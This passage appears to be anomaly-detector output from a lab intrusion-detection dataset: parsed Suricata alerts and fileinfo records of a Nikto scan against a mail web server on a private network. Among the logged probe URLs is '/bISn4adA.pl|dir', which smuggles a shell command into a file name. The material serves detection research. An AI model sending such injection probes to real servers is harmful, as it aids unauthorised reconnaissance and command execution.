"/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46822,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46822, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":684282763424512,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 684282763424512, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.210515+0000\",\"flow_id\":684282763424512,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46822,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.inc+\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.inc+\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.21 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.211929 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46824 -> 192.168.10.154:80", "/parser/model/time": 1583349514.211929, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46824, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.211929 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46824 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.21 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.idq", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.212088+0000\",\"flow_id\":785974704093502,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46824,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.idq\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.idq\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.212088, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":785974704093502,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46824,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.idq\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.idq\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46824,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.idq\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.idq\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.idq\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.idq\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.idq", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.idq", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46824,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46824, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":785974704093502,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 785974704093502, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.212088+0000\",\"flow_id\":785974704093502,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46824,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.idq\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.idq\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.21 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.213694 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46826 -> 192.168.10.154:80", "/parser/model/time": 1583349514.213694, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46826, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.213694 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46826 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.21 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.pl|dir", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.213956+0000\",\"flow_id\":750897706188682,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46826,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.pl|dir\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.pl|dir\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.213956, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":750897706188682,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46826,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.pl|dir\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.pl|dir\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46826,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.pl|dir\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.pl|dir\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.pl|dir\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.pl|dir\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.pl|dir", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.pl|dir", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46826,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46826, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":750897706188682,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 750897706188682, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.213956+0000\",\"flow_id\":750897706188682,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46826,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.pl|dir\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.pl|dir\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.21 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.215650 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46828 -> 192.168.10.154:80", "/parser/model/time": 1583349514.21565, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46828, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.215650 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46828 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.22 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.xbb", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.215801+0000\",\"flow_id\":724402052941536,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46828,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.xbb\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.xbb\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.215801, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":724402052941536,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46828,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.xbb\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.xbb\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46828,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.xbb\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.xbb\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.xbb\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.xbb\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.xbb", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.xbb", 